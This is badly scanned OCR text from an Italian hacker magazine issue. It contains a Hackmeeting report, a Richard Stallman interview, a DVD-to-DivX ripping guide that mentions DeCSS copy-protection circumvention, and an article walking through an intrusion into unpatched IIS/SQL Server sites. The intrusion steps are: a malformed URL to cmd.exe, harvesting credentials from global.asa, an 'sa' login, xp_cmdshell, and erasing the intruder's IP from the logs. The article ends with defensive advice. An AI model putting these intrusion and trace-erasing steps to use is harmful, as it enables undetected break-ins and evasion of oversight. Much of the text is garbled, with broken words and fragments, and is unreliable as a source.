mento dei danni all'immagine :-/ 



PC), l'Hackmeeting è l'evento con la 
connotazione politica e culturale 
più definita, tant'è che si svolge 
quasi sempre in un centro sociale. 
Quest'anno è toccato al Teatro Poli- 
valente Occupato di Bologna, che 
come di consueto ha pensato anche 
a offrire ai partecipanti pasti caldi e 
zone dove stendere un sacco a pelo 
o piantare una tenda (in una passa- 
ta edizione, svoltasi in un campeg- 
gio, anche le tende erano cablate!). 
Circa il 90% dei PC e dei portatili 
visti venerdì montava GNU/Linux 
come sistema operativo. Pochissimi 
i PC con una qualche versione di 
Windows, e anche la dozzina di Mac 
presenti montavano Gnu/Linux in 
versione PPC invece che Mac OS. In- 
somma, un ribaltamento delle quo- 
te di mercato del mondo esterno. 

La struttura tecnica 

Già nel tardo pomeriggio di ve- 
nerdì 21 si potevano contare più di 
200 computer collegati alla mega 
dorsale delle due sale LAN Space, 
progettata per reggere fino a 400 
postazioni. 

Verso l'esterno si poteva uscire 
soltanto con i servizi SSH, POP3 e 
IMAP (telnet e posta, tutto solo testo 
alla vecchia maniera), mentre un 
server IRC interno era linkato a 
irc.autistici.org e a irc.ecn.org. 

L'attribuzione dei numeri IP av- 
veniva secondo una variante del si- 
stema Dynamic Host Configuration 
Protocol, definito qui DCHP Umano. 
In pratica, bisognava girare per le 
sale alla ricerca di PBM, un simpati- 
co barbuto che, manualmente, at- 
tribuiva a ciascuno un indirizzo IP 
diverso, m 




CASE ARTISTICI 

Chi l'ha detto che gli amanti 
della tecnologia non sono 
sensibili all'arte? 
Il proprietario di questo PC 
si è fatto disegnare dalla 
sua ragazza una sensuale 
figura femminile sul case 
del PC 



COMPUTER AD ACQUA 

Quando si fa 1 'overclocking 

di un processore, per farlo 

funzionare a una frequenza 

superiore a quella per cui 

è stato progettato, ci si 

scontra con il problema del 

riscaldamento . 

Uno dei 

partecipanti 

ha pensato bene 

di usare il 

raffreddamento 

ad acqua! Sotto 

ai drive, 

si può notare 

il serbatoio. 
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INTERVISTA .■ 



INTERVISTA A RICHARD STALLMAN, IL PAPA DEL SOFTWARE LIBERO 



Richard Stallman: tra software 



ha risposta a molte delle domande che aueuamo preparato per lui. Questa interuista 




Parlaci della Free Softwa- f. 
re Foundatiorin e del "Free ( 
Software"- ■ - 

Molta gente ha idee confuse quando 
sul software libero. In parte, a causa 
dell'ambiguità della parola inglese 
"free", che significa "libero" o "gratui- 
to". Nell'espressione "Free Software", 
la parola "free" deve essere intesa co- 
me "libero", e non come "gratuito". Voi 
italiani dovreste sfruttare meglio la 
vostra lingua, parlando sempre di 
Software Libero, e non usando l'in ' 
se Free Software. 



_ftware libero?^, 
Il software libero lascia ai suoi utenti 
ogni libertà. Possono copiarlo, distri- 
buirlo, leggerne il codice sorgente e 
modificarlo. L'unico obbligo è quello 
di ridistribuire il software senza porre 
alcuna limitazione alla libertà di cui ' 
godeva. (Questi concetti sono espres- 
si in termini legali nella licenza GNU 
Public License, che si trova su 
www.gnu.org/copyleft/gpl.html e che 
accompagna il software libero. La GPL 
impedisce, per esempio, che una soft- 
ware house modifichi il software libe- 



fluesta filosofia non si ap- 
plica solo al software- -- 
Direi che questa è la nuova sfida. Ov- 
viamente, cose come l'hardware non 
potranno essere libere per molto 
tempo ancora. Non è possibile copia- 
re l'hardware, perché al momento 
non esistono tecnologie in grado di 
replicarlo. Malgrado ciò, non possia- 
mo basarci solo sulle tecnologie di co- 
pia attuali, perché questa sottovalu- 
tazione della tecnologia è la principa- 
le responsabile delle limitazioni di li- 
bertà che ci troviamo a si ' * 

Spiegaci perché- 
Un tempo non esisteva n 
impedissero di copiare i libri. Chiun- 
que poteva copiare a mano un libro, 
come gli amanuensi nel Medio Evo. 
Con le l'avvento delle tecnologie di 
stampa, gli autori e gli editori hanno 
chiesto leggi che impedissero la ri- 
pubblicazione di un libro, afferman- 
do che l'assenza di queste regole 
avrebbe scoraggiato la produzione di 
nuovi libri. Visto l'elevato costo delle 
macchine di stampa, per il grande 
pubblico non era possibile effettuare 
copie stampate di libri. Di fatto, le 



a una libertà che non avrebbero co- 
munque potuto esercitare, e lo "scam- 
bio" tra la libertà di copia e disponibi- 
lità di nuovi libri sembrava molto con- 
veniente. Le leggi sul copyright limi- 
tavano la libertà degli stampatori, 
non quella del grande pubblico. Poi, 
nell'ultima metà del secolo scorso, so- 
no arrivate le fotocopiatrici, i registra- 
tori a cassette, i video registratori e 
per utlime le tecnologie di copia digi- 
tale. Ora la limitazione di libertà è 
molto più pesante per le persone co- 
muni, e sarebbe ragionevole nego- 




o contratto meno re- 



, i sul copyright sono 

ogni giorno più pesanti. La costituzio- 
ne americana prevede il copyright, 
ma per un tempo determinato. Quel- 
lo che accade, è che le grandi aziende 
che detengono i diritti promuovono 
leggi che, di volta in volta, estendono 
il tempo di validità del divieto. E il ca- 
so per esempio di quello che chiamo 
"Legge. Mickey Mouse", con la quale 
Disney ha esteso retroattivamente di 
20 anni il copyright sulla figura di To- 
polino, un personaggio che dovrebbe 
ormai essere di dominio pubblico. 
Ma, grazie alla tecnologia, le majors 
sono arrivate al punto di non avere 
più bisogno delle leggi per imporre il 
copyrig u * 



I contenuti digitali vengono protetti 
con sistemi di crittografia e protezio- 
ne dagli accessi. Siccome è illegale 
violare questi sistemi, diventa illegale 
anche copiare il contenuto, sebbene 
in teoria la sua circolazione dovrebbe 
essere libera. Prendiamo gli e-Book, i 
libri elettronici cifrati e protetti da una 

-^H. ini n 



sono poco diffusi, e nessuno si sta 
preoccupando. Tra 20 o 30 anni, il 
copyright di alcuni e-Book potrebbe 
decadere, ma la copia di questi e- 
Book potrebbe rimanere illegale per- 
ché per copiarli sarebbe necessario 
aggirare o violare le protezioni soft- 
ware, un atto che è in sé fuori legge. 



Il copyright è anche defi- 
nito "diritto d'autore"- ■- 
Niente di più falso. La verità è che gli 
autori sono tra le entità più danneg- 



www.hackerjournal.it 



libero e diritti ciuili 



rappresenta quindi anche una sintesi del sua interuento. 



giate dai contratt 
grafiche, e molto spesso non perce 
scono nulla per il proprio lavoro. Le 
case discografiche riconoscono loro 
solo una minima parte dei guadagni 
di un disco. Quello che però accade 
molto spesso, è che nemmeno questa 
piccola parte arriva effettivamente 
agli autori, perché le case discografi- 
che trattengono questi guadagni per 
compensare l'investimento per la 
promozione del disco. Solitamente, 
questi termini vengono rinegoziati al- 
la scadenza del contratto, ma questo 
prevede per esempio che il gruppo o 
l'autore debba realizzare sei o sette 
dischi, prima che il contratto scada. 

^_l_ • § _ • _V ■• _ _l • 



rivano a questo traguardo 



enza bisogno ai prove ne ai pro- 
cessi (solitamente, scaduti i 30 giorni 
la persona veniva rilasciata e arre- 
stata nuovamente pochi minuti do- 
po). Con le leggi e le procedure im- 
poste dopo l'1 1 settembre, negli USA 
è diventato possibile incarcerare una 
persona per un tempo indefinito, sen- 
za processo e senza prove, semplice- 
mente dichiarando che si tratta di un 
"combattente straniero terrorista". La 
polizia non ha bisogno di provare 
questa affermazione. Ritengo che og- 
gi, il presidente Bush e il ministro del- 
la giustizia Ashcroft siano le due per- 
sone più pericolose al mondo per 



CHI E RMS? 

Richard Stallman, o RMS come spesso si firma, è 
nato nel 1953 a Manhattan. Laureatosi nel 1974 
ad Harvard, durante la sua vita accademica, ha fat- 
to parte dello staff del laboratorio di Intelligenza ar- 
tificiale del MIT, lavorando allo sviluppo di sistemi 
operativi. Nel 1 975 ha scritto il programma Emacs, 
popolare editor di testo per Unix. Nel 1 984, ha la- 
sciato l'università per fondare il progetto GNU, con 
l'obiettivo di sviluppare il sistema operativo GNU 
(Gnu is Not Unix), di cui oggi Linux è una variante (e 
infatti bisognnerebbe sempre chiamarlo GNU/Li- 
nux, e non solo Linux, che è solo il nome del kernel). 
Oltre allo sviluppo e alla diffusione del software li- 
bero, Richard è in prima linea nella battaglia per la 
difesa dei diritti civili negli USA e nel mondo, spe- 
cialmente quelli relativi alla libertà di espressione 
del pensiero e al copyright. 




r 



ni un giusto compensa- 
li fatto che un prodotto dell'intelletto 
sia "libero" non significa che debba 
essere gratuito. Niente impedisce 
che un CD di musica "libera" venga 
venduto con una bella confezione. 
Oppure, si potrebbe creare un siste- 
ma per effettuare donazioni diretta- 
mente agli autori, scavalcando le 
majors. Scarico liberamente un. bra- 
no dalla Rete, mi piace, e decido di 
donare un dollaro all'autore, facen- 
do clic su un pulsante sul mio com- 
puter. Ma rimango libero di distri- 
buirlo senza limitazioni. 

Oltre al copyright! sei im- 
pegnato su altri fronti 
della lotta per i diritti 
civili- Puoi parlarcene? 
Con la scusa del terrorismo, i governi 
hanno cominciato ad attaccare la li- 
bertà dei cittadini. Negli anni '80, ha 
destato scandalo una legge del Sud 
Africa che consentiva alla polizia di 



Il movimento del sofware open source 
"raccomanda", ma non impone, di la- 
sciare agli utenti la libertà sul softwa- 
re. Questo significa che le aziende 
che rendono disponibile il proprio 
software come Open Source, conti- 
nuano a mantenere alcuni dei diritti 
su di esso. Il movimento Open Source 
è meno radicale. Per esempio, affer- 
ma che il software commerciale è 
buono, ma non è la soluzione ottima- 
le, mentre noi della Free Software 
Foundation diciamo che il software 
commerciale rappresenta il male. 
Tutto sommato, c'è comunque una 
certa affinità tra le due correnti, e le 
differenze non superano l'1% delle 
posizioini. 



sa pensi di ques 



tingf ^ m *~ *- 
Sono elettrizzato dall'entusiasmo dei 
partecipanti. Specialmente dall'entu- 
siasmo per gli aspetti più politici della 
questione, m 



Come di consueto, al termine del suo in- 
tervento, RMS ha indossato una tunica e 
un'aureola realizzata da un disco per 
computer da 8" per rappresentare san- 
t'IGNUzio, e ha chiesto al pubblico di fa- 
re la professione di fede della chiesa di 
Emacs: "Non avrai altro OS al di fuori di 
GNU, e Linux è uno dei suoi kernel" 



La FSF ha bisogno di te 

Oltre a raccogliere 
donazioni che le 
permettano di portare 
avanti le sua attività, 
la Free Software 
Foundation ha bisogno 
di volontari che 
contribuiscano ai suoi progetti. In 
particolare, servono persone che tengano 
aggiornata la directory del software libero 
(www.gnu.org/directory), dedicandovi 
qualche ora alla settimana. 
Le informazioni per partecipare si trovano 
su www.gnu.org/help/directory.html 
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COME COPIARE UN DVD VIDEO SU CD-ROM 
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fiate iuostri 

Dud Uideo in Cd-Rom 



Grazie al codec DiuH, è molto comodo conuertire un film DUD so oo semplice Cd-Rom. 

Teoeodo aoche cooto che alcool programmi, raggroppaodo fotte le fasi di 

fabbricazione, facilitaoo eoormemeote il compito dei piccoli malaodrioi che siamo... 

H qoesto pooto la coouersiooe è oo uero gioco da ragazzi! 



I mercato del DVD Video in Ita- 
lia è in pieno boom, i prezzi dei 
lettori sono in caduta libera e i 
DVD hanno sostituito i VHS in 
un gran numero di video club. 
Purtroppo è tuttora impossibile, 
per la maggior parte dei possessori di DVD 
registrare i programmi Tv; attualmente i 
masterizzatori DVD Video sono ancora 
venduti a un prezzo decisamente troppo 
alto. Anche cercando soluzioni legate al 
mondo informatico il costo non giustifica il 
risulatato. In breve, l'avrete capito, per be- 
neficiare di una copia di un film DVD, biso- 
gna affrontare i percorsi alternativi che 
tanto ci affascinano! Per questo, un solo 
metodo, è oggi economicamente accessi- 
bile e prevede l'uso del codec DivX. Tecni- 



camente il codec DivX è un algoritmo di 
compressione e decompressione. Il princi- 
pio è semplice permette di "rigirare" i dati 
di un DVD su un CD-Rom. Detto in manie- 
ra diversa, grazie al DivX è possibile com- 
primere le sequenze video tra il 1 e il 20% 
della loro dimen- 
sione originale 
* J senza alterarne 
sensibilmente la 
qualità. Questo 
permette di con- 
vertire un DVD Vi- 
deo di 5 giga in un CD-Rom da 635 Mb, 
per la gioia di chi vuole caricarsi svariati 
film su un notebook da portarsi in vacanza, 
magari senza lettore DVD o con sistema Li- 
nux (per il quale non esistono software per 




la lettura dei DVD). La cosa fa molto felice 
anche chi ha una connessione a Internet a 
larga banda e utilizza sistemi di scambio fi- 
le come WinMx o Gnutella, e ovviamente 
preoccupa molto le case cinematografi- 
che, che temono che anche per i film si 
manifesti il fenomeno di copiatura di mas- 
sa che ha investito il mondo della musica 
dopo l'avvento del formato MP3. 

Molto concretamente, i file video .vob 
vengono convertiti in .avi con codifica 
DivX, mentre il suono è trasformato in for- 
mato Mp3 o AC3. Certamente la qualità 
viene alterata, ma permette di usare un 
masterizzatore da 1 00 € e supporti econo- 
mici invece di un DVD-R da 700 € e sup- 
porti che costano più di 1 € l'uno. 

Ma attenzione: i programmi che deci- 
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frano i DVD sono illegali negli USA, men- 
tre in Italia ancora la legge non ha chiarito 
esattamente questo caso. Per stare sicuri, 
conviene usare questi programmi solo con 
i DVD di cui si possiede l'originale. 



»HII'inizio 

Sino a qualche anno fa, la copia di un 
DVD era un lavoro certosino. Bisognava in 
un primo tempo, disporre di un program- 
ma per la copia dei file .vob sul proprio di- 
sco fisso (ad esempio il famoso DeCSS). In 
seguito era necessario un altro program- 
ma per sopprimere i segmenti inutili nei fi- 
le .vob, e bisognava ancora disporre di un 
terzo software per comprimere il video. Fi- 
nalmente si arrivava ad un quarto pro- 
gramma per comprimere il suono e co- 
munque capace di tagliare i file .avi troppo 
grandi. Tutto questo evadendo le protezio- 
ni contro la duplicazione e calcolando il 
tasso di compressione ideale. 

In breve, era indispensabile tutto un ar- 
senale senza parlare della pazienza di cui 
bisognava essere dotati, tanto più conside- 
rando che al primo errore bisognava ri- 
prendere tutto dall'inizio. 



» EasyDiux, 
passa a passo 

Fortunatamente sono comparsi sul 
mercato parecchi programmi riunendo tut- 
te le applicazioni in una sola. Tra queste 
abbiamo portato la nostra scelta su Easy- 
DivX, un programmino molto versatile e 
facile da utilizzare. 

E possibile che il risultato ottenuto non 
sarà forse così preciso che non se utiliz- 
zassimo altri software, comunque per un 
internauta lambda, questa utilità rappre- 
senta senza dubbio l'attrezzo più utile ed 
efficace. 

Sottolineiamo ugualmente che i tempi 
di duplicazione di un DVD dipendono dal- 
le prestazioni del vostro PC. Significa che 
più il vostro PC sarà recente più la realizza- 
zione di un CD sarà veloce. 



Con un equipaggiamento recente 
(Pentium IV), preventivate almeno cinque 
ore di codificazione. Con PC più vecchi, 
potreste arrivare a due giorni di codifica. 
Un'altra condizione necessaria è quella di 
disporre di molti giga di spazio nel disco, 
conviene considerare di avere al minimo 
10 giga liberi. 



1 Installazione Di EasyDivx 

Dopo aver scaricato il programmino 
(circa 3 Mb) dal sito web 
http://easydivx.does.it, fate un doppio 
click sull'icona dell'installer, e una volta ac- 
cettate le condizioni d'utilizzo, il programma 
si installa automaticamente nel sistema. E 
importante, per evitare problemi, che sia 
mantenuta la directory proposta all'installa- 
zione. Fate attenzione perché è indispensa- 
bile l'installazione preliminare del codec 
DivX (scaricabile su www.divx.com). Inoltre 
l'ultima versione del codec Divx, la 5.0, ha 
alcuni problemi, motivo per il quale vi consi- 
gliamo di scaricare la versione precedente, 
la 4.1 .2. Nell'ultima versione, EasyDivX per- 
mette di codificare in alta o in bassa risolu- 



2 Selezione Dei File 

In modalità Auto select movie (selezione 
automatica film), EasyDivX rileverà automa- 
ticamente il film sul DVD e selezionerà i file 
.vob. Tutti gli extra, i sottotitoli e altre sigle 
non saranno prese in considerazione da 
questa modalità, in compenso se desiderate 
conservare questi attributi è sufficiente utiliz- 
zare il drag & drop per trascinare i file .vob 
che contengono gli extra, in questo modo il 
programma li compirà sul disco rigido. 




3 Durata Del Film 

Dovrete in questo caso inserire la dura- 
ta del film (più lungo sarò il film, più alto 
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sarà il tasso di compressione da usare, 
perché la dimensione del file .avi finale è 
fissa a 650 Mb). Questo significa che per 
film più lunghi verrano convertiti con quali- 
tà audio e video inferiore. 

In un secondo tempo, dovrete scegliere 
il formato del file audio. Due scelte si pre- 
sentano: MP3 o AC3. Il primo è ben cono- 
sciuto da tutti. Si tratta del formato audio di 
compressione maggiormente usato sulla 
rete. Il secondo è il formato Dolby Digital 
che supporta fino a cinque canali audio. 
Molto concretamente, questo secondo for- 
mato è molto più versatile, ma richiede 
molto spazio sul vostro CD. RACCOMAN- 
DIAMO il formato Dolby Digital unicamen- 
te sui CD doppi. La codifica sarà più effica- 
ce con AC3 ma inutile se non possedete un 
solido impianto Home Theatre. 



reVTPflE 
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4 La Scelta Della Lingua 

Qui avete l'opportunità di scegliere il 
doppiaggio preferito, ovviamente solo se 
questo è presente sul DVD Video. 

Se lo desiderate potrete creare una se- 
condo file sonoro con un'altra lingua (per 
la versione originale, per esempio). 

Evidentemente questa seconda opzio- 
ne necessita di una doppia codifica della 
banda sonora che finirà per rallentare la 
velocità totale di codifica e diminuirà in 
maniera significativa la qualità video. 
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COME FARE 



Questa opzione è disponibile unicamente 
con il formato audio MP3. 

5 Numero Di Cd 

Qui dovrete indicare il numero di CD- 
Rom che volete utilizzare. Come già spiega- 
to, se avete scelto il formato AC3, sarà ne- 
cessario un doppio CD, negli altri casi sce- 
gliere l'opzione CD semplice che necessiterà 
di un minor tempo di codifica. 

Nell'ultima versione (0,81), potrete codi- 
ficare in bassa risoluzione su tre CD o in alta 
su più CD questa opzione è giusta per i film 
molto lunghi che sarebbero eccessivamente 
alterati da un compressione troppo elevata. 

Nella seconda finestra, si tratterà di 
scegliere il formato dell'immagine (4/3 o- 
16/9) a seconda delle vostre abitudini di 
visione. Potete anche decidere di convertire 
il 16/9 in 4/3, ciò però deforma legger- 
mente l'immagine. 
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6 Scelta Codec E Standard 

Qui dovrete specificare quale versione 
di codec Divx desiderate utilizzare, sul si- 
totrovate qualche consiglio in proposito. 
La versione 3.1 1 offre una buona qualità 
d'immagine e una codifica relativamente 
rapida, la versione 2-pass offre la miglio- 
re qualità d'immagine ma un tempo di 
codifica fino a due volte superiore alla 
versione 3.1 1 

Nella seconda finestra dovrete deter- 
minare lo standard video. 

Quest'ultimo assicura la sincronizza- 
zione tra video e la banda sonora. 

Un errore in questa finestra e rischiare 
di non vedere gli ultimi 1 minuti del film, lo 
standard utilizzato in Europa, è quello PAL. 

7 Selezione Dei Sottotitoli 

Grazie a questa opzione, potrete far 



sarà alto, maggiore sarà la qualità del 
suono, a discapito della qualità video (gli 
affanni della compressione...) 




comparire i sottotitoli presenti sul DVD vi- 
deo selezionando la casella "Create sub- 
titles files". Se spuntate la linguetta /7 Shut 
down when ready" il vostro computer si 
spegnerà automaticamente alla fine del- 
la codifica. 

8 Definire La Posizione Della Copia 

Ultima fase, designate una directoty 
nella quale saranno copiati i file (vob, au- 
dio, avi) creati durante le operazioni. I file 
temporanei saranno messi in "easydivx 
vob" il film finale sarà messo nel cdl e 
cd2, nel caso di un CD doppio. Un'ultima 
precauzione: guardate con attenzione lo 
spazio libero sul disco per fare in modo 
che la codifica possa essere ultimata. 




ES 



Opzioni Avanzate (Advanced) 

Tra le opzioni avanzate che possono 
aiutarvi fate attenzione a: 

Temporary Files - EasyDivX crea 
sul disco fisso dei file temporanei mol- 
to grandi. Grazie a questa opzione po- 
trete decidere di concellarli, quando 
avrete finito. 

Debung - serve a visualizzare i pro- 
grammi utilizzati da EasyDivX, potete fa- 
re uso di questa opzione se incontrerete 
problemi di utilizzo. 

Stereo audio - è possibile anche se- 
lezionare il bit-rate degli MP3, scegliere 
tra 96, 1 28,1 00 e 1 96 Kps; più il bit-rate 



» Codifica 



Quando avrete finalizzato tutte le tap- 
pe, dovrete soltanto fare un clic su Go For 
It per iniziare la codifica e... prendervi un 
po' di tempo libero per l'attesa.. 



» Scrittura 



Ultima fase, prima di utilizzare la vo- 
stra copia, dovete selezionare il CD1 nel- 
la directory che avete scelto. L'operazione 
durerà qualche minuto solamente, dopo 
di che sarete in grado di adoperare la vo- 
stra copia. 

Evidentemente gli extra e altre funzio- 
nalità proprie dei DVD saranno perse. La 
risoluzione sarà certamente meno buona 
che sul DVD originale ma, comunque mi- 
gliore che su un VHS e in quanto alla co- 
lonna sonora... niente da dire, ci 
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DINAMICA DI UN ATTACCO A MICROSOFT US E SQL SERVER 
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Microsoft MS E SQL Seroer 

Don Juan spiega come un malintenzionato può entrare in punta di piedi in un sito che 
utilizzi la piattaforma Microsoft, fare quello che uuole, e uscirne senza lasciare tracce 



he i server Microsoft siano poco 
sicuri è ormai un luogo comune, 
ma a ben vedere, non sono in 
tanti a conoscere quali siano effettivamen- 
te i problemi di questa piattaforma. Come 
al solito, tutti parlano, ma pochi ci capisco- 
no davvero. Proviamo allora a immagina- 



| in uno scenario apocalittico, cosa po- 
trebbe fare un malintenzionato a un server 



che non sia stato adeguatamen- 
te configurato e aggiornato. Alla fine, ve- 
dremo quali sono le precauzioni da pren- 
dere per evitare attacchi di questo tipo sui 
propri server. 

Solitamente, l'attacco proverrà da una 
connessione a Internet da un grosso provi- 
der, come Tiscali o Libero, al quale saran- 
no stati forniti dati personali falsi. In realtà, 
l'hacker sarebbe comunque rintracciabile, 
perché questi provider registrano il numero 
di telefono della linea utilizzata per la con- 
nessione (e utilizzare il servizio Telecom che 
permette di mascherare il numero del chia- 
mente, in questi casi non serve). Se non è 
uno sprovveduto, quindi, 



I utilizzerà un nu- 



mero imprecisato di server proxy tra il suo 
computer e il server da attaccare! - 



da confondere le acque. 

Il software necessario è abbastanza co- 
stoso, ma sicuramente non avrà acquistato 
le licenze regolari di Windows 2000 e di 
Sql Server Desktop Edition o Developer 
Edition. 

I server suscettibili a questo tipo di at- 
tacchi montano US 4.0 o superiore, SQL 
Server 7.0 o superiore e non sono protetti 



da un firewall. Non tutti gli amministratori 
hanno aggiornato US come si deve, e mol- 



to probabilmente 



| si ritrovano con un baco 




delle prime versioni che permette di navi- 
gare le tue cartelle e visualizzare i contenu- 
ti dei file di testo. |~ 



Per verificare il tipo di server e il sistema 
operativo, l'hacker utilizzerà probabilmen- 
te un servizio come quello di 

che, è in grado di stabilire la 
piattaforma su cui gira un qualunque sito. 
Per capire se c'è una firewall, l'hacker farà 
dei portscan su porte diverse dalla 80; in 
questo caso, un sistema di identificazione 
delle intrusioni (IDS), potrebbe già fare 
suonare un primo allarme, e impedire le 
fasi successive dell'attacco. 



» Analisi dell'attacco 

Il primo passo dell'hacker, sarà quel- 
lo di utilizzare un URL malformattato 
(malformed uri) in modo da puntare al file 
c:\winnt\system32\cmd.exe ed eseguire 
il comando dir (informazioni su questo tipo 



di attacchi, con esempi degli script peri uti- 
lizzati, si trovano su www.bismark.it). 

Se l'hacker è fortunato, a questo punto ve- 
drà il contenuto della directory: 



il sistema è 



nudo davanti ai suoi occhi. 



L'hacker si porterà ora nella directory 
dove risiedono le pagine asp, ovvero 
il sito vero e proprio (probabilmente 
c:\lnetpub\wwwroot) e, utilizzando il co- 
mando type, proverà a visualizzare il con- 
tenuto del file global.asa e di diverse pagi- 
ne Asp, alla ricerca della stringa di connes- 
sione a SQL Server, che dovrebbe essere 
del tipo: 

"Driver={(Microsoft SQL SERVER)};SER- 
VER=" Ste- 
in questa stringa sono contenuti i valori di 
USERID e PASS, che sono le credenziali per 
collegarsi al database SQL Server. 
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Ora utilizzerà PEnterprise Manager 
per fare una nuova registrazione, 
specificando come nome l'indirizzo 
IP della vittima, e come username e pas- 
sword quelle che avrà trovato nella stringa 
di connessione. 

Se la stringa contiene l'utente "sa", o 
se una volta verificati i privilegi del- 
l'utente individuato scoprirà che 
questo appartiene al gruppo dei database 
administrators, l'hacker avrà vita facile e 
potrà passare subito al punto successivo. In 
caso contrario, farà un po' di tentativi di in- 
dividuare la password dell'utente "sa", 
usando una password vuota oppure quelle 
più comuni. 

Ora, sempre utilizzando l'Enterprise 
Manager, andrà sul database ma- 
ster, aprirà il tool sql query analyzer 
e proverà a vedere il contenuto di e: digi- 
tando xmd_cmdshell 'dir c:\'. Se sarà fortu- 
nato, avrà a disposizione una shell sul si- 
stema con privilegi di admin, e potrà fare 
quello che gli pare. 

Questo scenario, già di per se dram- 
matico, può diventare tragico, in 
quanto l'hacker potrà modificare i 
log di sistema ed eliminare le sue tracce. Si 
porterà nella directory che contiene i file di 
log degli attacchi e, supponento per esem- 
pio che l'attacco sia avvenuto il 1 Gennaio 
2001 e l'indirizzo IP dell'hacker sia 
192.168.0.2, userà una sequenza di co- 
mandi come questa: 



In pratica; con find /v troverà tutte le righe 
che non contengono l'IP e le copierà in un 
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file temporaneo. In seguito, cancellerà il fi- 
le di log e darà al file temporaneo il nome 
del file di log cancellato. Potrebbe anche 
modificare gli attributi di data di creazione 
e di modifica del file di log, in modo che 
non appaia alcuna traccia di tutte queste 
manomissioni. 

Solitamente, il fatto che il file di log sia 
aperto in esclusiva dall'US non intimorisce 
l'intruso: non farà altro che stoppare US 
con i comandi MS-DOS, modificare il file e 
far ripartire US prima che l'admin possa in- 
tuire qualcosa. 

» Come difendersi 

Questo tipo di attacco è più pericoloso 
di quelli apportati con ne o che avvengono 
dopo l'installazione di un trojan, perché 
non alterano in alcun modo il sistema e 
non lasciano traccia alcuna: non ci saran- 
no strani processi in esecuzione, né nuove 
chiavi di registro nuove, né tantomeno 
verranno utilizzate porte tipo 31004, che 
balzano subito all'occhio. SQL Server ver- 
rà comandato da una porta perfettamen- 
te regolare. 

Per evitare che l'attacco descritto abbia 
successo, bisogna disabilitare o cambiare 
la password dell' utente "sa", che come im- 
postazione predefinita è vuota, controllare 
che le pagine asp non contengano riferi- 
menti diretti a SQL Server, ma utilizzare in- 
vece un DSN di sistema, e conglobare lì ' 
informazioni per l'accesso. 

Nelle tabelle degli utenti ammessi 
entrare nelle aree riservate del sito utiliz- 
zare esclusivamente password cifrate, e 
mai in chiaro. 

Un attacker potrebbe entrare in posses- 
so di queste password e violare altri sistemi 
e servizi degli utenti (email, cartelle protet- 
te). Per questo, conviene installare sul Web 
server la dll gratuita "jeript", che cifra le 
password con algoritmo irreversibile 
(MD5). A questo punto, il controllo di ac- 
cesso si effettua confrontando stringhe ci- 
frate e non in chiaro. 

Va da sé che, se un utente dovesse di- 
menticare una password, il sistema dovrà 
generarne automaticamente una nuova, 
essendo completamente impossibile risa- 
lire alla password in chiaro da quella ci- 
frata, m 



COME EVITARE 
GLI ERRORI 

Il Webmaster di questo 
esempio è stato 
veramente un pollo; 
per evitare i suoi errori più 
gravi bisogna innanzi tutto 
consultare la sezione relativa 
agli aggiornamenti di sicurezza 
del sito del produttore del 
server (in questo caso, 
www . microsoft . com/technet ) . 
Il secondo grave errore, è stato 
quello di non modificare la 
password predefinita dell'utente 
"sa" di SQL Server) . Una lista 
di tutti i passi da fare per 
rendere sicuro SQL Server si 
trova sul sito 

www . sqlsecurity . coiti/ checklist . asp 
Infine, ha inserito la stringa 
di connessione al database (che 
contiene la password di accesso) 
direttamente nelle pagine Asp, 
invece di utilizzare un DSN di 
sistema, metodo più sicuro e 
consigliabile. Ulteriori info su 
www . powerasp . com/content /database 
/dsn_vs_dsnless . asp 
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SE NON PUOI ELIMINARE UNO SPAMMER, ALMENO ROMPIGLI LE BA**E! 



Spamm! 



o spamming e uno 



portabili, ma uale anche 



iaggi, promozioni, offerte stre- 
pitose, pornografia gratis, van- 
taggiose iniziative commerciali 
^^B multilivello: non c'è giorno, 
ormai, che qualcuna tra le 
e-mail che riceviamo quotidiana- 
mente non contenga spazzatura 
promozionale simile a questa. Ov- 
viamente senza che noi abbiamo mai ri- 
chiesto esplicitamente informazioni simili. 
Ma tant'è: è divenuta necessità il dover 
perdere tempo nello scaricare, nel filtrare 
e nello spulciare tra i vari messaggi rice- 
vuti alla ricerca di quelli che ci interessa- 
no, dovendo per forza di cose trascorre- 
re qualche minuto al giorno cancellando 
tutta la "spazzatura" che instasa le nostre 
caselle email. 

Si chiama spam: il termine deri- 
va dall'inglese "spiced ham", pro- 
sciutto speziato. Pare infatti che negli 
USA sia molto diffuso un tipo di carne in 
scatola, prodotto da una azienda chia- 
mata Hormel, che porta proprio questo 
nome: SPAM. 

Il suo collegamento con le invadenti 
email che costantemente girano per la 
rete assillando milioni di utenti deriva da 
un famoso sketch dei Monty Python's , il 
quale descrive una scenetta in cui una 
coppia entra in un ristorante e si trova a 
sedere a fianco di una tavolata di simpa- 
tici individui ubriachi (con tanto di elmet- 
ti vichinghi in testa) che con il loro canto 
assillante, "spam, spam, spam!" coprono 
le voci dei due mentre stanno ordinando 
la cena, causando alla fine la resa del- 
l'uomo, che assillato ordinerà appunto lo 
spam. 

Sin dallorigine del nome del termine, 
dunque, "spam" viene immediatamente 
identificato come "disturbo". E la diretta 
semplicità di questa omonimia è 
quantomai azzeccata. 



» Un fiume in piena 



Ma cosa succede in pratica? E 1 sem- 
plice: la rete offre una incredibile oppor- 



o caso il detto se lo conosci lo euiti.. 




tunità di comunicazione, la possibilità di 
raggiungere milioni di utenti sparsi per il 
mondo in brevissimo tempo con un mez- 
zo in continua espansione e di grande ef- 
ficacia mediatica. 

L'avvento delle nuove tecnologie e la 
possibilità per chiunque di ricevere mes- 
saggi di posta elettronica, unite al natu- 
rale interessamento del mondo commer- 
ciale al fenomeno, hanno fatto sì che il 
vecchio sistema dei volantini la- 
sciati nella casella della posta (già 
di per loro insopportabili) si sia 
adattato perfettamente alla rete, 
moltiplicandosi però in modo esorbitan- 
te: mandare migliaia e migliaia di email 



ha costi praticamente nulli, e così, per gli 
spammers, non resta che acquisire il 
maggior numero di indirizzi di posta e 
lanciare con pochi click una mole deva- 
stante di messaggi promozionali. 

Detta così potrebbe sembrare (e in un 
certo senso, come già affermato, lo è) la 
semplice applicazione telematica del 
concetto dei volantini. 

C'è il fatto, però, che per fare questo 
paragone dovremmo immaginare 
che i volantini sopra citati venisse- 
ro inviati a spese del destinatario: 
difatti chi riceve spam in modo massiccio 
non deve soltanto eliminare i messaggi 
che non gli interessano, ma perdere pri- 
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SE NON PUOI ELIMINARE UNO SPAMMER, ALMENO ROMPIGLI LE BA**E! 



ma il proprio tempo e i propri soldi nello 
scaricarli. E ci sono persone che regolar- 
mente devono chiudere un indirizzo di 
posta (che magari usano per lavoro) e 
aprirne un altro a causa di questa im- 
